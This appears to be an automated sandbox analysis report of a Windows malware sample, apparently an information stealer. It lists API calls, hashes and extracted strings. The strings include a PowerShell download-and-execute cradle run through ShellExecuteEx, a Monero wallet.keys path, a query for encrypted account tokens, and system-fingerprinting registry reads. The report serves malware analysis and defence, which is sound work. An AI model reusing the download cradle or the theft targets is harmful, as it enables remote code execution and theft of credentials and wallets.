                            • API ID: Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: Password
                            • API String ID: 2808661185-3434357891
                            • Opcode ID: eaca6207c86b7f1faeaae9ab20649785af7423051fac6921f63835bc03896158
                            • Instruction ID: 1e421d5557b8466566b36d9032264aecf941ac635ea1c4239ebf8678fc0b9f7a
                            • Opcode Fuzzy Hash: eaca6207c86b7f1faeaae9ab20649785af7423051fac6921f63835bc03896158
                            • Instruction Fuzzy Hash: 936118B59041689BDB24DB50CC45BDAB7B9BF44300F00C1E9E68DA6241EBB06FC9CFA5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,012BEF28,00000000,?,00690E2C,00000000,?,00000000), ref: 00688130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00688137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00688158
                            • __aulldiv.LIBCMT ref: 00688172
                            • __aulldiv.LIBCMT ref: 00688180
                            • wsprintfA.USER32 ref: 006881AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            • Opcode ID: 90dcdd758337ea7277f2e8646be7971c2848f9c34c492a54fbd7be7a7bfab3ba
                            • Instruction ID: 6ad9a3475cf151c460ac84006a8bed9cf30068bfe2dbd40a72a139f95e3d5abf
                            • Opcode Fuzzy Hash: 90dcdd758337ea7277f2e8646be7971c2848f9c34c492a54fbd7be7a7bfab3ba
                            • Instruction Fuzzy Hash: 8A214DB1E44219AFDB04DFD4CC49FAEB7B9FB44B00F104219F605BB280DB7969018BA5
                            APIs
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 006747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00674839
                              • Part of subcall function 006747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00674849
                            • InternetOpenA.WININET(00690DF7,00000001,00000000,00000000,00000000), ref: 0067610F
                            • StrCmpCA.SHLWAPI(?,012BF3F0), ref: 00676147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0067618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006761B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 006761DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0067620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00676249
                            • InternetCloseHandle.WININET(?), ref: 00676253
                            • InternetCloseHandle.WININET(00000000), ref: 00676260
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: 836d42eb1e014f6b3faaac2f1157bcb63cd5b4cb57c75edba542a3a008df9486
                            • Instruction ID: ba2764f106b14a35397550565cea8a706d34989b79fa5fd357d3b1a6ef423322
                            • Opcode Fuzzy Hash: 836d42eb1e014f6b3faaac2f1157bcb63cd5b4cb57c75edba542a3a008df9486
                            • Instruction Fuzzy Hash: 175171B1900208AFDB64DFA0DC49BEE77B9FB04701F108198B609A71C1DB746A89CF99
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                            • lstrlen.KERNEL32(00000000), ref: 0067BC9F
                              • Part of subcall function 00688E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00688E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0067BCCD
                            • lstrlen.KERNEL32(00000000), ref: 0067BDA5
                            • lstrlen.KERNEL32(00000000), ref: 0067BDB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 8f8c4d69ec142c288450b7902453c634d0e3e7c592e1cfdd9555ed7294ac7f2c
                            • Instruction ID: 7667f7e755682b6a8ca8db6394dd3b4ea17980b56c6fa14dfd703007589e0ca7
                            • Opcode Fuzzy Hash: 8f8c4d69ec142c288450b7902453c634d0e3e7c592e1cfdd9555ed7294ac7f2c
                            • Instruction Fuzzy Hash: 91B112B19101049BEF58FBE0CD96EEE733AAF54300F50425DF90666191EF386A49CB76
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: c8a8d7e701dbe667d1def28ace848cada5a561b2a2e63c9805f0e1dd74da15b0
                            • Instruction ID: b78bca35f059f6cd35e706221e2b83b4f22608612f8048355df18347e5d35ffb
                            • Opcode Fuzzy Hash: c8a8d7e701dbe667d1def28ace848cada5a561b2a2e63c9805f0e1dd74da15b0
                            • Instruction Fuzzy Hash: 4BF03A3090824DFFE348AFE0E90976C7B70FB04702F040298F64986290DA724A419B9A
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00674FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00674FD1
                            • InternetOpenA.WININET(00690DDF,00000000,00000000,00000000,00000000), ref: 00674FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00675011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00675041
                            • InternetCloseHandle.WININET(?), ref: 006750B9
                            • InternetCloseHandle.WININET(?), ref: 006750C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: a81c098c7f0d9926c3ae2e59535fd9c50227ed2778d51694c28bfbed7de8aa71
                            • Instruction ID: 730741dae9a9bdb41f414a594f04322cd9f0f491599e8e46d544b173c6c951d4
                            • Opcode Fuzzy Hash: a81c098c7f0d9926c3ae2e59535fd9c50227ed2778d51694c28bfbed7de8aa71
                            • Instruction Fuzzy Hash: BC31F7B4A40218ABDB24CF54DC85BDCB7B5FB48704F1081D9EA09A7281DBB06EC58F99
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00688426
                            • wsprintfA.USER32 ref: 00688459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0068847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0068848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00688499
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                            • RegQueryValueExA.ADVAPI32(00000000,012BEE50,00000000,000F003F,?,00000400), ref: 006884EC
                            • lstrlen.KERNEL32(?), ref: 00688501
                            • RegQueryValueExA.ADVAPI32(00000000,012BEF10,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00690B34), ref: 00688599
                            • RegCloseKey.ADVAPI32(00000000), ref: 00688608
                            • RegCloseKey.ADVAPI32(00000000), ref: 0068861A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: aa3c42f77fde8fa9ae7dc24e0582fef6c3c5fc154e604c3ca054296187470e7d
                            • Instruction ID: 80179d471e8f625f93cfd43b5c1c835540fe1d13e4ae1dc84e96027a567145b9
                            • Opcode Fuzzy Hash: aa3c42f77fde8fa9ae7dc24e0582fef6c3c5fc154e604c3ca054296187470e7d
                            • Instruction Fuzzy Hash: EC210AB1900218AFDB24DB54DC85FE9B3B9FB48700F40C299A609A6140DF71AA85CFD4
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006876A4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006876AB
                            • RegOpenKeyExA.ADVAPI32(80000002,012ABD70,00000000,00020119,00000000), ref: 006876DD
                            • RegQueryValueExA.ADVAPI32(00000000,012BEF88,00000000,00000000,?,000000FF), ref: 006876FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 00687708
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 2e37ac8c99be04475cb9d6a2b3887a87f9e612f991372e5dc2e67e3d9cba8fd4
                            • Instruction ID: 77dfd77d4bd31523cea142b0e1aa84ee6147c3531c5ef9998d8d773a3fe52a2f
                            • Opcode Fuzzy Hash: 2e37ac8c99be04475cb9d6a2b3887a87f9e612f991372e5dc2e67e3d9cba8fd4
                            • Instruction Fuzzy Hash: 9E014FB5A44204BBEB04EBE4DC49FADB7B9FB48701F104654FA05E7290EA709904CB55
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00687734
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0068773B
                            • RegOpenKeyExA.ADVAPI32(80000002,012ABD70,00000000,00020119,006876B9), ref: 0068775B
                            • RegQueryValueExA.ADVAPI32(006876B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0068777A
                            • RegCloseKey.ADVAPI32(006876B9), ref: 00687784
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 470089ea50ed2a7fc9583e3a0b971923489869367719520c5e38a7b1e1a07402
                            • Instruction ID: 1431571298b3cf25685074d7ccf68a0d4ac56fbcacb8ce336958d83fc10f2f38
                            • Opcode Fuzzy Hash: 470089ea50ed2a7fc9583e3a0b971923489869367719520c5e38a7b1e1a07402
                            • Instruction Fuzzy Hash: 590167B5A40308BFDB04DBE4DC49FAEB7BCFB48701F104258FA05A7281DA705500CB51
                            APIs
                            • CreateFileA.KERNEL32(:h,80000000,00000003,00000000,00000003,00000080,00000000,?,00683AEE,?), ref: 006892FC
                            • GetFileSizeEx.KERNEL32(000000FF,:h), ref: 00689319
                            • CloseHandle.KERNEL32(000000FF), ref: 00689327
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: :h$:h
                            • API String ID: 1378416451-1831227254
                            • Opcode ID: 2220ffe936f8bf669aa74def050988227801ae1cef8e3a09f687843e5d47ee8c
                            • Instruction ID: 9758bf300d523cd9adc3221c8bb084cc886864d85e028c45487cd2adffe64c80
                            • Opcode Fuzzy Hash: 2220ffe936f8bf669aa74def050988227801ae1cef8e3a09f687843e5d47ee8c
                            • Instruction Fuzzy Hash: F7F03C75E44208BBDB14EBB0DC49BAE77FABB58710F108394B651A72C0DA7196018F94
                            APIs
                            • memset.MSVCRT ref: 006840D5
                            • RegOpenKeyExA.ADVAPI32(80000001,012BDE80,00000000,00020119,?), ref: 006840F4
                            • RegQueryValueExA.ADVAPI32(?,012BEA90,00000000,00000000,00000000,000000FF), ref: 00684118
                            • RegCloseKey.ADVAPI32(?), ref: 00684122
                            • lstrcat.KERNEL32(?,00000000), ref: 00684147
                            • lstrcat.KERNEL32(?,012BE8B0), ref: 0068415B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValuememset
                            • String ID:
                            • API String ID: 2623679115-0
                            • Opcode ID: 4db77052385a3add2607e532c6fc89f15756579c05b892af1358bbade609fad2
                            • Instruction ID: b95e89dc799a87573b9559c5150912aa3de440986917805e150a0fcd7f840232
                            • Opcode Fuzzy Hash: 4db77052385a3add2607e532c6fc89f15756579c05b892af1358bbade609fad2
                            • Instruction Fuzzy Hash: 3B41AAB6D001086BDB58FBA4DC56FFE733EBB48300F40865DB61A57181EE755B888B92
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006799EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00679A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00679A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,0067148F,00000000), ref: 00679A5A
                            • LocalFree.KERNEL32(0067148F), ref: 00679A90
                            • CloseHandle.KERNEL32(000000FF), ref: 00679A9A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: a7b196a23964c8ee470425c7b0e2a44471a252647ed3253c997a8c7a61132b28
                            • Instruction ID: 31f31e1a772d6f0b417ced7894c976b071020fd0a7a44a99fbf0fad27889fe6e
                            • Opcode Fuzzy Hash: a7b196a23964c8ee470425c7b0e2a44471a252647ed3253c997a8c7a61132b28
                            • Instruction Fuzzy Hash: E131E1B4A01209EFDB14CFA4C885BAE77F6BF48310F108258E915A7390D779AA41CFA1
                            APIs
                            Strings
                            Yara matches
                            Similarity
                            • API ID: String___crt$Typememset
                            • String ID:
                            • API String ID: 3530896902-3916222277
                            • Opcode ID: e2a63e0e5ec08ead939fd5066081de7be62dbae43d7ed3e92ad1a520edfa41ba
                            • Instruction ID: 6913038a59546fb63a4ba64a90be274f35cc55f16c8d47eb8e8141ff8fbb6164
                            • Opcode Fuzzy Hash: e2a63e0e5ec08ead939fd5066081de7be62dbae43d7ed3e92ad1a520edfa41ba
                            • Instruction Fuzzy Hash: 224115B110079C5EDF21AB248C84FFBBBFA9B45714F1445ECE98A86182E2719A45DF34
                            APIs
                            • lstrcat.KERNEL32(?,012BEB38), ref: 006847DB
                              • Part of subcall function 00688DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00688E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00684801
                            • lstrcat.KERNEL32(?,?), ref: 00684820
                            • lstrcat.KERNEL32(?,?), ref: 00684834
                            • lstrcat.KERNEL32(?,012AA938), ref: 00684847
                            • lstrcat.KERNEL32(?,?), ref: 0068485B
                            • lstrcat.KERNEL32(?,012BDD20), ref: 0068486F
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 00688D90: GetFileAttributesA.KERNEL32(00000000,?,00671B54,?,?,0069564C,?,?,00690E1F), ref: 00688D9F
                              • Part of subcall function 00684570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00684580
                              • Part of subcall function 00684570: RtlAllocateHeap.NTDLL(00000000), ref: 00684587
                              • Part of subcall function 00684570: wsprintfA.USER32 ref: 006845A6
                              • Part of subcall function 00684570: FindFirstFileA.KERNEL32(?,?), ref: 006845BD
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: fb7a98f2d50d8ae03482984586ae4df806bd95465134c5d1aa4d18746a5bab17
                            • Instruction ID: 9f334b1be6d1a89f3163855979df138b4e8f1b10c8851e5187a86122ffc3c981
                            • Opcode Fuzzy Hash: fb7a98f2d50d8ae03482984586ae4df806bd95465134c5d1aa4d18746a5bab17
                            • Instruction Fuzzy Hash: EB315FB2900208ABDB54FBB0DC85EE9737DBB58700F40469DB71996081EE749789CB9A
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00682D85
                            Strings
                            • ')", xrefs: 00682CB3
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00682CC4
                            • <, xrefs: 00682D39
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00682D04
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: 08e9121092a3011796adfbe5aaa36226bafb95b47025d01f8e5ff4f8508cc020
                            • Instruction ID: 24c3b02f62939e50a9ff176296b3c73332c7aefb4260c247cbe8005a1840d4d0
                            • Opcode Fuzzy Hash: 08e9121092a3011796adfbe5aaa36226bafb95b47025d01f8e5ff4f8508cc020
                            • Instruction Fuzzy Hash: 6C41CD718102089AEF58FBE0C891BDDB77AAF14300F40425EE416B7191DF786A4ACFA9
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00679F41
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: e0f2638334e8c565637f6cce13765c1d9488e58401af799626b73eeea4002c65
                            • Instruction ID: 35691a7acc4d9d3f00714df054b51a81eccafa05dfd0fcca1e79446df8c0af05
                            • Opcode Fuzzy Hash: e0f2638334e8c565637f6cce13765c1d9488e58401af799626b73eeea4002c65
                            • Instruction Fuzzy Hash: 28616F709002089FEB28EFA4CD96FED777AAF40304F008518F90E5F581EB746A46CB96
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • memset.MSVCRT ref: 0068716A
                            Strings
                            • sh, xrefs: 00687111
                            • sh, xrefs: 006872AE, 00687179, 0068717C
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0068718C
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemset
                            • String ID: sh$sh$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 4047604823-824928704
                            • Opcode ID: 077866c952417ddc83c2d2049b02c23b1ab90a7e51095683ea2187a8191dc9d1
                            • Instruction ID: 99e9c8a14fd5053361fb5184fe799dc8b35f9c6322c7697536325412f0646ecc
                            • Opcode Fuzzy Hash: 077866c952417ddc83c2d2049b02c23b1ab90a7e51095683ea2187a8191dc9d1
                            • Instruction Fuzzy Hash: D2518EB0C042189BDB64EB90DC95BEEB776AF54300F2442ADE61562281EB746E88CF59
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00687E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00687E3E
                            • RegOpenKeyExA.ADVAPI32(80000002,012AB980,00000000,00020119,?), ref: 00687E5E
                            • RegQueryValueExA.ADVAPI32(?,012BDE00,00000000,00000000,000000FF,000000FF), ref: 00687E7F
                            • RegCloseKey.ADVAPI32(?), ref: 00687E92
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: f4145b372c6bf101d687e913939e6eaa7ad8511d712086483488da6e58f042cc
                            • Instruction ID: 9e3463f1b52fd5d276c4579b8e7173bbeb320772ab3ea57762f4c748b5c01d27
                            • Opcode Fuzzy Hash: f4145b372c6bf101d687e913939e6eaa7ad8511d712086483488da6e58f042cc
                            • Instruction Fuzzy Hash: B2115EB1A44205EBD718DF94DD49FBBBBBDFB04B10F204259F615A7680D77468018BA1
                            APIs
                            • StrStrA.SHLWAPI(012BEAD8,?,?,?,0068140C,?,012BEAD8,00000000), ref: 0068926C
                            • lstrcpyn.KERNEL32(008BAB88,012BEAD8,012BEAD8,?,0068140C,?,012BEAD8), ref: 00689290
                            • lstrlen.KERNEL32(?,?,0068140C,?,012BEAD8), ref: 006892A7
                            • wsprintfA.USER32 ref: 006892C7
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: b5c62715f6b4412c22e22bf8c6b85ff5694679e92dbf78f3594d188d030bf557
                            • Instruction ID: 3abe8178ccceebd0b58e7dcf2aba76b75f131f5d871f0b8f80afab8c7cd9d6fc
                            • Opcode Fuzzy Hash: b5c62715f6b4412c22e22bf8c6b85ff5694679e92dbf78f3594d188d030bf557
                            • Instruction Fuzzy Hash: 1F01CC75510108FFCB08DFECC998EAE7BB9FB44364F148248F9199B305C631AA40DB95
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006712B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006712BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006712D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006712F5
                            • RegCloseKey.ADVAPI32(?), ref: 006712FF
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00686663
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
